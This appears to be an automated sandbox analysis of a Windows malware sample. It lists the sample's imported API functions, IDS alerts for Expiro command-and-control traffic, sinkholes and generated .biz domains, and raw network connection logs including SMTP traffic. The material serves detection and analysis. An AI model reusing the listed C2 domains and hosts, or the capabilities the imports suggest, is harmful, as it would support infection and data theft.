                                                                                                                                                                                                                                                                                                                                                                                                              RT_STRING0xb32780x65cdataEnglishGreat Britain0.34336609336609336
                                                                                                                                                                                                                                                                                                                                                                                                              RT_STRING0xb38d80x388dataEnglishGreat Britain0.377212389380531
                                                                                                                                                                                                                                                                                                                                                                                                              RT_STRING0xb3c600x158Matlab v4 mat-file (little endian) n, numeric, rows 0, columns 0EnglishUnited States0.502906976744186
                                                                                                                                                                                                                                                                                                                                                                                                              RT_GROUP_ICON0xb3db80x84dataEnglishGreat Britain0.6439393939393939
                                                                                                                                                                                                                                                                                                                                                                                                              RT_GROUP_ICON0xb3e400x14dataEnglishGreat Britain1.15
                                                                                                                                                                                                                                                                                                                                                                                                              RT_GROUP_ICON0xb3e580x14dataEnglishGreat Britain1.25
                                                                                                                                                                                                                                                                                                                                                                                                              RT_GROUP_ICON0xb3e700x14dataEnglishGreat Britain1.25
                                                                                                                                                                                                                                                                                                                                                                                                              RT_VERSION0xb3e880x19cdataEnglishGreat Britain0.5339805825242718
                                                                                                                                                                                                                                                                                                                                                                                                              RT_MANIFEST0xb40280x26cASCII text, with CRLF line terminatorsEnglishUnited States0.5145161290322581
DLL | Import
WSOCK32.dll | __WSAFDIsSet, setsockopt, ntohs, recvfrom, sendto, htons, select, listen, WSAStartup, bind, closesocket, connect, socket, send, WSACleanup, ioctlsocket, accept, WSAGetLastError, inet_addr, gethostbyname, gethostname, recv
VERSION.dll | VerQueryValueW, GetFileVersionInfoW, GetFileVersionInfoSizeW
WINMM.dll | timeGetTime, waveOutSetVolume, mciSendStringW
COMCTL32.dll | ImageList_Remove, ImageList_SetDragCursorImage, ImageList_BeginDrag, ImageList_DragEnter, ImageList_DragLeave, ImageList_EndDrag, ImageList_DragMove, ImageList_ReplaceIcon, ImageList_Create, InitCommonControlsEx, ImageList_Destroy
MPR.dll | WNetCancelConnection2W, WNetGetConnectionW, WNetAddConnection2W, WNetUseConnectionW
WININET.dll | InternetReadFile, InternetCloseHandle, InternetOpenW, InternetSetOptionW, InternetCrackUrlW, HttpQueryInfoW, InternetConnectW, HttpOpenRequestW, HttpSendRequestW, FtpOpenFileW, FtpGetFileSize, InternetOpenUrlW, InternetQueryOptionW, InternetQueryDataAvailable
PSAPI.DLL | EnumProcesses, GetModuleBaseNameW, GetProcessMemoryInfo, EnumProcessModules
USERENV.dll | CreateEnvironmentBlock, DestroyEnvironmentBlock, UnloadUserProfile, LoadUserProfileW
KERNEL32.dll | HeapAlloc, Sleep, GetCurrentThreadId, RaiseException, MulDiv, GetVersionExW, GetSystemInfo, MultiByteToWideChar, WideCharToMultiByte, GetModuleHandleW, QueryPerformanceCounter, VirtualFreeEx, OpenProcess, VirtualAllocEx, WriteProcessMemory, ReadProcessMemory, CreateFileW, SetFilePointerEx, ReadFile, WriteFile, FlushFileBuffers, TerminateProcess, CreateToolhelp32Snapshot, Process32FirstW, Process32NextW, SetFileTime, GetFileAttributesW, FindFirstFileW, FindClose, DeleteFileW, FindNextFileW, lstrcmpiW, MoveFileW, CopyFileW, CreateDirectoryW, RemoveDirectoryW, SetSystemPowerState, QueryPerformanceFrequency, FindResourceW, LoadResource, LockResource, SizeofResource, GetProcessHeap, OutputDebugStringW, GetLocalTime, CompareStringW, CompareStringA, InterlockedIncrement, InterlockedDecrement, DeleteCriticalSection, EnterCriticalSection, LeaveCriticalSection, InitializeCriticalSectionAndSpinCount, GetStdHandle, CreatePipe, InterlockedExchange, TerminateThread, GetTempPathW, GetTempFileNameW, VirtualFree, FormatMessageW, GetExitCodeProcess, SetErrorMode, GetPrivateProfileStringW, WritePrivateProfileStringW, GetPrivateProfileSectionW, WritePrivateProfileSectionW, GetPrivateProfileSectionNamesW, FileTimeToLocalFileTime, FileTimeToSystemTime, SystemTimeToFileTime, LocalFileTimeToFileTime, GetDriveTypeW, GetDiskFreeSpaceExW, GetDiskFreeSpaceW, GetVolumeInformationW, SetVolumeLabelW, CreateHardLinkW, DeviceIoControl, SetFileAttributesW, GetShortPathNameW, CreateEventW, SetEvent, GetEnvironmentVariableW, SetEnvironmentVariableW, GlobalLock, GlobalUnlock, GlobalAlloc, GetFileSize, GlobalFree, GlobalMemoryStatusEx, Beep, GetComputerNameW, GetWindowsDirectoryW, GetSystemDirectoryW, GetCurrentProcessId, GetCurrentThread, GetProcessIoCounters, CreateProcessW, SetPriorityClass, LoadLibraryW, VirtualAlloc, LoadLibraryExW, HeapFree, WaitForSingleObject, CreateThread, DuplicateHandle, GetLastError, CloseHandle, GetCurrentProcess, GetProcAddress, LoadLibraryA, FreeLibrary, GetModuleFileNameW, GetFullPathNameW, ExitProcess, ExitThread, GetSystemTimeAsFileTime, SetCurrentDirectoryW, IsDebuggerPresent, GetCurrentDirectoryW, ResumeThread, GetStartupInfoW, TlsGetValue, TlsAlloc, TlsSetValue, TlsFree, SetLastError, HeapSize, GetCPInfo, GetACP, GetOEMCP, IsValidCodePage, UnhandledExceptionFilter, SetUnhandledExceptionFilter, GetModuleFileNameA, HeapReAlloc, HeapCreate, SetHandleCount, GetFileType, GetStartupInfoA, SetStdHandle, GetConsoleCP, GetConsoleMode, LCMapStringW, LCMapStringA, RtlUnwind, SetFilePointer, GetTimeZoneInformation, GetTimeFormatA, GetDateFormatA, FreeEnvironmentStringsW, GetEnvironmentStringsW, GetCommandLineW, GetTickCount, GetStringTypeA, GetStringTypeW, GetLocaleInfoA, GetModuleHandleA, WriteConsoleA, GetConsoleOutputCP, WriteConsoleW, CreateFileA, SetEndOfFile, EnumResourceNamesW, SetEnvironmentVariableA
USER32.dll | SetWindowPos, GetCursorInfo, RegisterHotKey, ClientToScreen, GetKeyboardLayoutNameW, IsCharAlphaW, IsCharAlphaNumericW, IsCharLowerW, IsCharUpperW, GetMenuStringW, GetSubMenu, GetCaretPos, IsZoomed, MonitorFromPoint, GetMonitorInfoW, SetWindowLongW, SetLayeredWindowAttributes, FlashWindow, GetClassLongW, TranslateAcceleratorW, IsDialogMessageW, GetSysColor, InflateRect, DrawFocusRect, DrawTextW, FrameRect, DrawFrameControl, FillRect, PtInRect, DestroyAcceleratorTable, CreateAcceleratorTableW, SetCursor, GetWindowDC, GetSystemMetrics, GetActiveWindow, CharNextW, wsprintfW, RedrawWindow, DrawMenuBar, DestroyMenu, SetMenu, GetWindowTextLengthW, CreateMenu, IsDlgButtonChecked, DefDlgProcW, ReleaseCapture, SetCapture, WindowFromPoint, CreateIconFromResourceEx, mouse_event, ExitWindowsEx, SetActiveWindow, FindWindowExW, EnumThreadWindows, SetMenuDefaultItem, InsertMenuItemW, IsMenu, TrackPopupMenuEx, GetCursorPos, DeleteMenu, CheckMenuRadioItem, CopyImage, GetMenuItemCount, SetMenuItemInfoW, GetMenuItemInfoW, SetForegroundWindow, IsIconic, FindWindowW, SystemParametersInfoW, PeekMessageW, SendInput, GetAsyncKeyState, SetKeyboardState, GetKeyboardState, GetKeyState, VkKeyScanW, LoadStringW, DialogBoxParamW, MessageBeep, EndDialog, SendDlgItemMessageW, GetDlgItem, SetWindowTextW, CopyRect, ReleaseDC, GetDC, EndPaint, BeginPaint, GetClientRect, GetMenu, DestroyWindow, EnumWindows, GetDesktopWindow, IsWindow, IsWindowEnabled, IsWindowVisible, EnableWindow, InvalidateRect, GetWindowThreadProcessId, AttachThreadInput, GetFocus, GetWindowTextW, ScreenToClient, SendMessageTimeoutW, EnumChildWindows, CharUpperBuffW, GetClassNameW, GetParent, GetDlgCtrlID, SendMessageW, MapVirtualKeyW, PostMessageW, GetWindowRect, SetUserObjectSecurity, GetUserObjectSecurity, CloseDesktop, CloseWindowStation, OpenDesktopW, SetProcessWindowStation, GetProcessWindowStation, OpenWindowStationW, MessageBoxW, DefWindowProcW, MoveWindow, AdjustWindowRectEx, SetRect, SetClipboardData, EmptyClipboard, CountClipboardFormats, CloseClipboard, GetClipboardData, IsClipboardFormatAvailable, OpenClipboard, BlockInput, GetMessageW, LockWindowUpdate, DispatchMessageW, GetMenuItemID, TranslateMessage, SetFocus, PostQuitMessage, KillTimer, CreatePopupMenu, RegisterWindowMessageW, SetTimer, ShowWindow, CreateWindowExW, RegisterClassExW, LoadIconW, LoadCursorW, GetSysColorBrush, GetForegroundWindow, MessageBoxA, DestroyIcon, UnregisterHotKey, CharLowerBuffW, MonitorFromRect, keybd_event, LoadImageW, GetWindowLongW
GDI32.dll | DeleteObject, GetObjectW, GetTextExtentPoint32W, ExtCreatePen, StrokeAndFillPath, StrokePath, EndPath, SetPixel, CloseFigure, CreateCompatibleBitmap, CreateCompatibleDC, SelectObject, StretchBlt, GetDIBits, LineTo, AngleArc, MoveToEx, Ellipse, PolyDraw, BeginPath, Rectangle, GetDeviceCaps, SetBkMode, RoundRect, SetBkColor, CreatePen, CreateSolidBrush, SetTextColor, CreateFontW, GetTextFaceW, GetStockObject, CreateDCW, GetPixel, DeleteDC, SetViewportOrgEx
COMDLG32.dll | GetSaveFileNameW, GetOpenFileNameW
ADVAPI32.dll | RegEnumValueW, RegDeleteValueW, RegDeleteKeyW, RegSetValueExW, RegCreateKeyExW, GetUserNameW, RegConnectRegistryW, RegEnumKeyExW, CloseServiceHandle, UnlockServiceDatabase, LockServiceDatabase, OpenSCManagerW, InitiateSystemShutdownExW, AdjustTokenPrivileges, RegCloseKey, RegQueryValueExW, RegOpenKeyExW, OpenThreadToken, OpenProcessToken, LookupPrivilegeValueW, DuplicateTokenEx, CreateProcessAsUserW, CreateProcessWithLogonW, InitializeSecurityDescriptor, InitializeAcl, GetLengthSid, SetSecurityDescriptorDacl, CopySid, LogonUserW, GetTokenInformation, GetAclInformation, GetAce, AddAce, GetSecurityDescriptorDacl
SHELL32.dll | DragQueryPoint, ShellExecuteExW, SHGetFolderPathW, DragQueryFileW, SHEmptyRecycleBinW, SHBrowseForFolderW, SHFileOperationW, SHGetPathFromIDListW, SHGetDesktopFolder, SHGetMalloc, ExtractIconExW, Shell_NotifyIconW, ShellExecuteW, DragFinish
ole32.dll | OleSetMenuDescriptor, MkParseDisplayName, OleSetContainedObject, CoInitialize, CoUninitialize, CoCreateInstance, CreateStreamOnHGlobal, CoTaskMemAlloc, CoTaskMemFree, CLSIDFromString, StringFromCLSID, IIDFromString, StringFromIID, OleInitialize, CreateBindCtx, CLSIDFromProgID, CoInitializeSecurity, CoCreateInstanceEx, CoSetProxyBlanket, OleUninitialize
OLEAUT32.dll | SafeArrayAllocData, SafeArrayAllocDescriptorEx, SysAllocString, OleLoadPicture, SafeArrayGetVartype, SafeArrayDestroyData, SafeArrayAccessData, VarR8FromDec, VariantTimeToSystemTime, VariantClear, VariantCopy, VariantInit, SafeArrayDestroyDescriptor, LoadRegTypeLib, GetActiveObject, SafeArrayUnaccessData
Language of compilation system | Country where language is spoken | Map
English | Great Britain |
English | United States |
Timestamp | SID | Signature | Severity | Source IP | Source Port | Dest IP | Dest Port | Protocol
2024-11-05T17:02:53.521181+0100 | 2018141 | ET MALWARE Possible Compromised Host AnubisNetworks Sinkhole Cookie Value Snkz | 1 | 18.141.10.107 | 80 | 192.168.2.5 | 49706 | TCP
2024-11-05T17:02:53.521181+0100 | 2037771 | ET MALWARE Possible Compromised Host AnubisNetworks Sinkhole Cookie Value btst | 1 | 18.141.10.107 | 80 | 192.168.2.5 | 49706 | TCP
2024-11-05T17:02:54.601386+0100 | 2018141 | ET MALWARE Possible Compromised Host AnubisNetworks Sinkhole Cookie Value Snkz | 1 | 54.244.188.177 | 80 | 192.168.2.5 | 49710 | TCP
2024-11-05T17:02:54.601386+0100 | 2037771 | ET MALWARE Possible Compromised Host AnubisNetworks Sinkhole Cookie Value btst | 1 | 54.244.188.177 | 80 | 192.168.2.5 | 49710 | TCP
2024-11-05T17:02:56.050638+0100 | 2051648 | ET MALWARE DNS Query to Expiro Related Domain (przvgke .biz) | 1 | 192.168.2.5 | 55575 | 1.1.1.1 | 53 | UDP
2024-11-05T17:02:57.035218+0100 | 2018141 | ET MALWARE Possible Compromised Host AnubisNetworks Sinkhole Cookie Value Snkz | 1 | 44.221.84.105 | 80 | 192.168.2.5 | 59392 | TCP
2024-11-05T17:02:57.035218+0100 | 2037771 | ET MALWARE Possible Compromised Host AnubisNetworks Sinkhole Cookie Value btst | 1 | 44.221.84.105 | 80 | 192.168.2.5 | 59392 | TCP
2024-11-05T17:02:57.087877+0100 | 2051648 | ET MALWARE DNS Query to Expiro Related Domain (przvgke .biz) | 1 | 192.168.2.5 | 50357 | 1.1.1.1 | 53 | UDP
2024-11-05T17:02:57.456122+0100 | 2051649 | ET MALWARE DNS Query to Expiro Related Domain (knjghuig .biz) | 1 | 192.168.2.5 | 51197 | 1.1.1.1 | 53 | UDP
2024-11-05T17:02:58.582766+0100 | 2850851 | ETPRO MALWARE Win32/Expiro.NDO CnC Activity | 1 | 192.168.2.5 | 59396 | 172.234.222.138 | 80 | TCP
2024-11-05T17:02:58.738163+0100 | 2051649 | ET MALWARE DNS Query to Expiro Related Domain (knjghuig .biz) | 1 | 192.168.2.5 | 54147 | 1.1.1.1 | 53 | UDP
2024-11-05T17:03:02.887458+0100 | 2022930 | ET EXPLOIT Possible CVE-2016-2211 Symantec Cab Parsing Buffer Overflow | 1 | 4.175.87.197 | 443 | 192.168.2.5 | 59401 | TCP
                                                                                                                                                                                                                                                                                                                                                                                                              2024-11-05T17:03:17.701232+01002018141ET MALWARE Possible Compromised Host AnubisNetworks Sinkhole Cookie Value Snkz147.129.31.21280192.168.2.559491TCP
                                                                                                                                                                                                                                                                                                                                                                                                              2024-11-05T17:03:17.701232+01002037771ET MALWARE Possible Compromised Host AnubisNetworks Sinkhole Cookie Value btst147.129.31.21280192.168.2.559491TCP
                                                                                                                                                                                                                                                                                                                                                                                                              2024-11-05T17:03:19.520664+01002018141ET MALWARE Possible Compromised Host AnubisNetworks Sinkhole Cookie Value Snkz113.251.16.15080192.168.2.559498TCP
                                                                                                                                                                                                                                                                                                                                                                                                              2024-11-05T17:03:19.520664+01002037771ET MALWARE Possible Compromised Host AnubisNetworks Sinkhole Cookie Value btst113.251.16.15080192.168.2.559498TCP
                                                                                                                                                                                                                                                                                                                                                                                                              2024-11-05T17:03:26.271989+01002018141ET MALWARE Possible Compromised Host AnubisNetworks Sinkhole Cookie Value Snkz134.246.200.16080192.168.2.559538TCP
                                                                                                                                                                                                                                                                                                                                                                                                              2024-11-05T17:03:26.271989+01002037771ET MALWARE Possible Compromised Host AnubisNetworks Sinkhole Cookie Value btst134.246.200.16080192.168.2.559538TCP
                                                                                                                                                                                                                                                                                                                                                                                                              2024-11-05T17:03:27.269331+01002018141ET MALWARE Possible Compromised Host AnubisNetworks Sinkhole Cookie Value Snkz118.208.156.24880192.168.2.559550TCP
                                                                                                                                                                                                                                                                                                                                                                                                              2024-11-05T17:03:27.269331+01002037771ET MALWARE Possible Compromised Host AnubisNetworks Sinkhole Cookie Value btst118.208.156.24880192.168.2.559550TCP
                                                                                                                                                                                                                                                                                                                                                                                                              2024-11-05T17:03:34.829754+01002018141ET MALWARE Possible Compromised Host AnubisNetworks Sinkhole Cookie Value Snkz135.164.78.20080192.168.2.559592TCP
                                                                                                                                                                                                                                                                                                                                                                                                              2024-11-05T17:03:34.829754+01002037771ET MALWARE Possible Compromised Host AnubisNetworks Sinkhole Cookie Value btst135.164.78.20080192.168.2.559592TCP
                                                                                                                                                                                                                                                                                                                                                                                                              2024-11-05T17:03:35.730953+01002018141ET MALWARE Possible Compromised Host AnubisNetworks Sinkhole Cookie Value Snkz13.94.10.3480192.168.2.559599TCP
                                                                                                                                                                                                                                                                                                                                                                                                              2024-11-05T17:03:35.730953+01002037771ET MALWARE Possible Compromised Host AnubisNetworks Sinkhole Cookie Value btst13.94.10.3480192.168.2.559599TCP
                                                                                                                                                                                                                                                                                                                                                                                                              2024-11-05T17:03:42.742917+01002022930ET EXPLOIT Possible CVE-2016-2211 Symantec Cab Parsing Buffer Overflow14.175.87.197443192.168.2.559640TCP
                                                                                                                                                                                                                                                                                                                                                                                                              2024-11-05T17:03:53.102955+01002018141ET MALWARE Possible Compromised Host AnubisNetworks Sinkhole Cookie Value Snkz134.211.97.4580192.168.2.559724TCP
                                                                                                                                                                                                                                                                                                                                                                                                              2024-11-05T17:03:53.102955+01002037771ET MALWARE Possible Compromised Host AnubisNetworks Sinkhole Cookie Value btst134.211.97.4580192.168.2.559724TCP
                                                                                                                                                                                                                                                                                                                                                                                                              2024-11-05T17:04:00.505646+01002850851ETPRO MALWARE Win32/Expiro.NDO CnC Activity1192.168.2.55975118.208.156.24880TCP
                                                                                                                                                                                                                                                                                                                                                                                                              2024-11-05T17:04:01.083801+01002018141ET MALWARE Possible Compromised Host AnubisNetworks Sinkhole Cookie Value Snkz118.246.231.12080192.168.2.559752TCP
                                                                                                                                                                                                                                                                                                                                                                                                              2024-11-05T17:04:01.083801+01002037771ET MALWARE Possible Compromised Host AnubisNetworks Sinkhole Cookie Value btst118.246.231.12080192.168.2.559752TCP
                                                                                                                                                                                                                                                                                                                                                                                                              2024-11-05T17:04:02.298627+01002018141ET MALWARE Possible Compromised Host AnubisNetworks Sinkhole Cookie Value Snkz13.254.94.18580192.168.2.559754TCP
                                                                                                                                                                                                                                                                                                                                                                                                              2024-11-05T17:04:02.298627+01002037771ET MALWARE Possible Compromised Host AnubisNetworks Sinkhole Cookie Value btst13.254.94.18580192.168.2.559754TCP
                                                                                                                                                                                                                                                                                                                                                                                                              2024-11-05T17:04:23.874141+01002051651ET MALWARE DNS Query to Expiro Domain (eufxebus .biz)1192.168.2.5549961.1.1.153UDP
                                                                                                                                                                                                                                                                                                                                                                                                              2024-11-05T17:04:26.438965+01002051651ET MALWARE DNS Query to Expiro Domain (eufxebus .biz)1192.168.2.5562571.1.1.153UDP
                                                                                                                                                                                                                                                                                                                                                                                                              2024-11-05T17:04:48.309363+01002051653ET MALWARE DNS Query to Expiro Domain (htwqzczce .biz)1192.168.2.5562791.1.1.153UDP
                                                                                                                                                                                                                                                                                                                                                                                                              Nov 5, 2024 17:02:52.558911085 CET497082049192.168.2.5212.162.149.53
                                                                                                                                                                                                                                                                                                                                                                                                              Nov 5, 2024 17:02:52.563884974 CET204949708212.162.149.53192.168.2.5
                                                                                                                                                                                                                                                                                                                                                                                                              Nov 5, 2024 17:02:52.565356016 CET497082049192.168.2.5212.162.149.53
                                                                                                                                                                                                                                                                                                                                                                                                              Nov 5, 2024 17:02:52.574569941 CET497082049192.168.2.5212.162.149.53
                                                                                                                                                                                                                                                                                                                                                                                                              Nov 5, 2024 17:02:52.579363108 CET204949708212.162.149.53192.168.2.5
                                                                                                                                                                                                                                                                                                                                                                                                              Nov 5, 2024 17:02:52.881268024 CET804970754.244.188.177192.168.2.5
                                                                                                                                                                                                                                                                                                                                                                                                              Nov 5, 2024 17:02:52.885867119 CET4970780192.168.2.554.244.188.177
                                                                                                                                                                                                                                                                                                                                                                                                              Nov 5, 2024 17:02:52.891374111 CET804970754.244.188.177192.168.2.5
                                                                                                                                                                                                                                                                                                                                                                                                              Nov 5, 2024 17:02:52.891897917 CET4970780192.168.2.554.244.188.177
                                                                                                                                                                                                                                                                                                                                                                                                              Nov 5, 2024 17:02:53.054061890 CET4970980192.168.2.518.141.10.107
                                                                                                                                                                                                                                                                                                                                                                                                              Nov 5, 2024 17:02:53.057914972 CET204949708212.162.149.53192.168.2.5
                                                                                                                                                                                                                                                                                                                                                                                                              Nov 5, 2024 17:02:53.058182955 CET497082049192.168.2.5212.162.149.53
                                                                                                                                                                                                                                                                                                                                                                                                              Nov 5, 2024 17:02:53.059041977 CET804970918.141.10.107192.168.2.5
                                                                                                                                                                                                                                                                                                                                                                                                              Nov 5, 2024 17:02:53.059536934 CET4970980192.168.2.518.141.10.107
                                                                                                                                                                                                                                                                                                                                                                                                              Nov 5, 2024 17:02:53.067039013 CET4970980192.168.2.518.141.10.107
                                                                                                                                                                                                                                                                                                                                                                                                              Nov 5, 2024 17:02:53.067274094 CET4970980192.168.2.518.141.10.107
                                                                                                                                                                                                                                                                                                                                                                                                              Nov 5, 2024 17:02:53.072017908 CET804970918.141.10.107192.168.2.5
                                                                                                                                                                                                                                                                                                                                                                                                              Nov 5, 2024 17:02:53.072087049 CET804970918.141.10.107192.168.2.5
                                                                                                                                                                                                                                                                                                                                                                                                              Nov 5, 2024 17:02:53.265121937 CET497082049192.168.2.5212.162.149.53
                                                                                                                                                                                                                                                                                                                                                                                                              Nov 5, 2024 17:02:53.504396915 CET804970618.141.10.107192.168.2.5
                                                                                                                                                                                                                                                                                                                                                                                                              Nov 5, 2024 17:02:53.515320063 CET4970680192.168.2.518.141.10.107
                                                                                                                                                                                                                                                                                                                                                                                                              Nov 5, 2024 17:02:53.521181107 CET804970618.141.10.107192.168.2.5
                                                                                                                                                                                                                                                                                                                                                                                                              Nov 5, 2024 17:02:53.521245003 CET4970680192.168.2.518.141.10.107
                                                                                                                                                                                                                                                                                                                                                                                                              Nov 5, 2024 17:02:53.746259928 CET4971080192.168.2.554.244.188.177
                                                                                                                                                                                                                                                                                                                                                                                                              Nov 5, 2024 17:02:53.751439095 CET804971054.244.188.177192.168.2.5
                                                                                                                                                                                                                                                                                                                                                                                                              Nov 5, 2024 17:02:53.751625061 CET4971080192.168.2.554.244.188.177
                                                                                                                                                                                                                                                                                                                                                                                                              Nov 5, 2024 17:02:53.772322893 CET4971080192.168.2.554.244.188.177
                                                                                                                                                                                                                                                                                                                                                                                                              Nov 5, 2024 17:02:53.772322893 CET4971080192.168.2.554.244.188.177
                                                                                                                                                                                                                                                                                                                                                                                                              Nov 5, 2024 17:02:53.777313948 CET804971054.244.188.177192.168.2.5
                                                                                                                                                                                                                                                                                                                                                                                                              Nov 5, 2024 17:02:53.777328968 CET804971054.244.188.177192.168.2.5
                                                                                                                                                                                                                                                                                                                                                                                                              Nov 5, 2024 17:02:54.491164923 CET804970918.141.10.107192.168.2.5
                                                                                                                                                                                                                                                                                                                                                                                                              Nov 5, 2024 17:02:54.502829075 CET49711587192.168.2.551.195.88.199
                                                                                                                                                                                                                                                                                                                                                                                                              Nov 5, 2024 17:02:54.507719040 CET5874971151.195.88.199192.168.2.5
                                                                                                                                                                                                                                                                                                                                                                                                              Nov 5, 2024 17:02:54.507874012 CET49711587192.168.2.551.195.88.199
                                                                                                                                                                                                                                                                                                                                                                                                              Nov 5, 2024 17:02:54.526206970 CET4970980192.168.2.518.141.10.107
                                                                                                                                                                                                                                                                                                                                                                                                              Nov 5, 2024 17:02:54.531476974 CET804970918.141.10.107192.168.2.5
                                                                                                                                                                                                                                                                                                                                                                                                              Nov 5, 2024 17:02:54.531596899 CET4970980192.168.2.518.141.10.107
                                                                                                                                                                                                                                                                                                                                                                                                              Nov 5, 2024 17:02:54.593645096 CET804971054.244.188.177192.168.2.5
                                                                                                                                                                                                                                                                                                                                                                                                              Nov 5, 2024 17:02:54.596106052 CET4971080192.168.2.554.244.188.177
                                                                                                                                                                                                                                                                                                                                                                                                              Nov 5, 2024 17:02:54.601386070 CET804971054.244.188.177192.168.2.5
                                                                                                                                                                                                                                                                                                                                                                                                              Nov 5, 2024 17:02:54.601525068 CET4971080192.168.2.554.244.188.177
                                                                                                                                                                                                                                                                                                                                                                                                              Nov 5, 2024 17:02:54.763011932 CET5938880192.168.2.544.221.84.105
                                                                                                                                                                                                                                                                                                                                                                                                              Nov 5, 2024 17:02:54.768091917 CET805938844.221.84.105192.168.2.5
                                                                                                                                                                                                                                                                                                                                                                                                              Nov 5, 2024 17:02:54.768311977 CET5938880192.168.2.544.221.84.105
                                                                                                                                                                                                                                                                                                                                                                                                              Nov 5, 2024 17:02:54.776277065 CET5938880192.168.2.544.221.84.105
                                                                                                                                                                                                                                                                                                                                                                                                              Nov 5, 2024 17:02:54.776551962 CET5938880192.168.2.544.221.84.105
                                                                                                                                                                                                                                                                                                                                                                                                              Nov 5, 2024 17:02:54.781457901 CET805938844.221.84.105192.168.2.5
                                                                                                                                                                                                                                                                                                                                                                                                              Nov 5, 2024 17:02:54.781635046 CET805938844.221.84.105192.168.2.5
                                                                                                                                                                                                                                                                                                                                                                                                              Nov 5, 2024 17:02:55.116058111 CET5938880192.168.2.544.221.84.105
                                                                                                                                                                                                                                                                                                                                                                                                              Nov 5, 2024 17:02:55.202234030 CET5938980192.168.2.544.221.84.105
                                                                                                                                                                                                                                                                                                                                                                                                              Nov 5, 2024 17:02:55.207536936 CET805938944.221.84.105192.168.2.5
                                                                                                                                                                                                                                                                                                                                                                                                              Nov 5, 2024 17:02:55.207632065 CET5938980192.168.2.544.221.84.105
                                                                                                                                                                                                                                                                                                                                                                                                              Nov 5, 2024 17:02:55.219504118 CET5938980192.168.2.544.221.84.105
                                                                                                                                                                                                                                                                                                                                                                                                              Nov 5, 2024 17:02:55.219504118 CET5938980192.168.2.544.221.84.105
                                                                                                                                                                                                                                                                                                                                                                                                              Nov 5, 2024 17:02:55.224365950 CET805938944.221.84.105192.168.2.5
                                                                                                                                                                                                                                                                                                                                                                                                              Nov 5, 2024 17:02:55.224401951 CET805938944.221.84.105192.168.2.5
                                                                                                                                                                                                                                                                                                                                                                                                              Nov 5, 2024 17:02:55.367278099 CET5939080192.168.2.554.244.188.177
                                                                                                                                                                                                                                                                                                                                                                                                              Nov 5, 2024 17:02:55.372328997 CET805939054.244.188.177192.168.2.5
                                                                                                                                                                                                                                                                                                                                                                                                              Nov 5, 2024 17:02:55.372415066 CET5939080192.168.2.554.244.188.177
Nov 5, 2024 17:02:55.373518944 CET | 59390 | 80 | 192.168.2.5 | 54.244.188.177
Nov 5, 2024 17:02:55.373532057 CET | 59390 | 80 | 192.168.2.5 | 54.244.188.177
Nov 5, 2024 17:02:55.378396988 CET | 80 | 59390 | 54.244.188.177 | 192.168.2.5
Nov 5, 2024 17:02:55.378503084 CET | 80 | 59390 | 54.244.188.177 | 192.168.2.5
Nov 5, 2024 17:02:55.403208017 CET | 587 | 49711 | 51.195.88.199 | 192.168.2.5
Nov 5, 2024 17:02:55.403467894 CET | 49711 | 587 | 192.168.2.5 | 51.195.88.199
Nov 5, 2024 17:02:55.408492088 CET | 587 | 49711 | 51.195.88.199 | 192.168.2.5
Nov 5, 2024 17:02:55.647495985 CET | 587 | 49711 | 51.195.88.199 | 192.168.2.5
Nov 5, 2024 17:02:55.647650957 CET | 49711 | 587 | 192.168.2.5 | 51.195.88.199
Nov 5, 2024 17:02:55.652617931 CET | 587 | 49711 | 51.195.88.199 | 192.168.2.5
Nov 5, 2024 17:02:55.878238916 CET | 80 | 59389 | 44.221.84.105 | 192.168.2.5
Nov 5, 2024 17:02:55.891474962 CET | 587 | 49711 | 51.195.88.199 | 192.168.2.5
Nov 5, 2024 17:02:55.894474983 CET | 49711 | 587 | 192.168.2.5 | 51.195.88.199
Nov 5, 2024 17:02:55.899585009 CET | 587 | 49711 | 51.195.88.199 | 192.168.2.5
Nov 5, 2024 17:02:55.912812948 CET | 80 | 59389 | 44.221.84.105 | 192.168.2.5
Nov 5, 2024 17:02:55.914055109 CET | 59389 | 80 | 192.168.2.5 | 44.221.84.105
Nov 5, 2024 17:02:56.031486034 CET | 59389 | 80 | 192.168.2.5 | 44.221.84.105
Nov 5, 2024 17:02:56.036477089 CET | 80 | 59389 | 44.221.84.105 | 192.168.2.5
Nov 5, 2024 17:02:56.081315041 CET | 59391 | 80 | 192.168.2.5 | 172.234.222.143
Nov 5, 2024 17:02:56.086473942 CET | 80 | 59391 | 172.234.222.143 | 192.168.2.5
Nov 5, 2024 17:02:56.086570978 CET | 59391 | 80 | 192.168.2.5 | 172.234.222.143
Nov 5, 2024 17:02:56.091259003 CET | 59391 | 80 | 192.168.2.5 | 172.234.222.143
Nov 5, 2024 17:02:56.091412067 CET | 59391 | 80 | 192.168.2.5 | 172.234.222.143
Nov 5, 2024 17:02:56.096141100 CET | 80 | 59391 | 172.234.222.143 | 192.168.2.5
Nov 5, 2024 17:02:56.096252918 CET | 80 | 59391 | 172.234.222.143 | 192.168.2.5
Nov 5, 2024 17:02:56.144057989 CET | 587 | 49711 | 51.195.88.199 | 192.168.2.5
Nov 5, 2024 17:02:56.144073963 CET | 587 | 49711 | 51.195.88.199 | 192.168.2.5
Nov 5, 2024 17:02:56.144088030 CET | 587 | 49711 | 51.195.88.199 | 192.168.2.5
Nov 5, 2024 17:02:56.144098043 CET | 587 | 49711 | 51.195.88.199 | 192.168.2.5
Nov 5, 2024 17:02:56.144131899 CET | 49711 | 587 | 192.168.2.5 | 51.195.88.199
Nov 5, 2024 17:02:56.217242002 CET | 80 | 59390 | 54.244.188.177 | 192.168.2.5
Nov 5, 2024 17:02:56.222570896 CET | 49711 | 587 | 192.168.2.5 | 51.195.88.199
Nov 5, 2024 17:02:56.226798058 CET | 59390 | 80 | 192.168.2.5 | 54.244.188.177
Nov 5, 2024 17:02:56.227493048 CET | 587 | 49711 | 51.195.88.199 | 192.168.2.5
Nov 5, 2024 17:02:56.232024908 CET | 80 | 59390 | 54.244.188.177 | 192.168.2.5
Nov 5, 2024 17:02:56.232109070 CET | 59390 | 80 | 192.168.2.5 | 54.244.188.177
Nov 5, 2024 17:02:56.372340918 CET | 59392 | 80 | 192.168.2.5 | 44.221.84.105
Nov 5, 2024 17:02:56.377392054 CET | 80 | 59392 | 44.221.84.105 | 192.168.2.5
Nov 5, 2024 17:02:56.377476931 CET | 59392 | 80 | 192.168.2.5 | 44.221.84.105
Nov 5, 2024 17:02:56.378994942 CET | 59392 | 80 | 192.168.2.5 | 44.221.84.105
Nov 5, 2024 17:02:56.379080057 CET | 59392 | 80 | 192.168.2.5 | 44.221.84.105
Nov 5, 2024 17:02:56.383819103 CET | 80 | 59392 | 44.221.84.105 | 192.168.2.5
